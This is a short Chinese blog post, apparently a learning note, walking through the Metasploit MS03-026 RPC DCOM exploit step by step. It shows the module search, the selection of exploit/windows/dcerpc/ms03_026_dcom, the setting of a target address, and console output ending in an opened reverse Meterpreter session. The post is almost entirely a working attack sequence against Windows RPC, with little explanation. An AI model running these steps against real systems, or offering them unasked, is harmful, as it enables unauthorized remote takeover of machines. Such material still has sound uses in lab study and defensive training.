码迷,mamicode.com
首页 > Web开发 > 详细

metasploit学习之ms03_026

时间:2015-04-25 18:07:46      阅读:263      评论:0      收藏:0      [点我收藏+]

标签:

傻瓜式利用ms03_026_dcom:

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow
exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution


msf > use exploit/windows/dcerpc/ms03_026_dcom //设置漏洞代码
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port


Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 10.0.0.100:4444 
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Sending exploit ...
[*] Sending stage (770048 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800

meterpreter >       //成功了!

 

metasploit学习之ms03_026

标签:

原文地址:http://www.cnblogs.com/iDerr/p/4456222.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!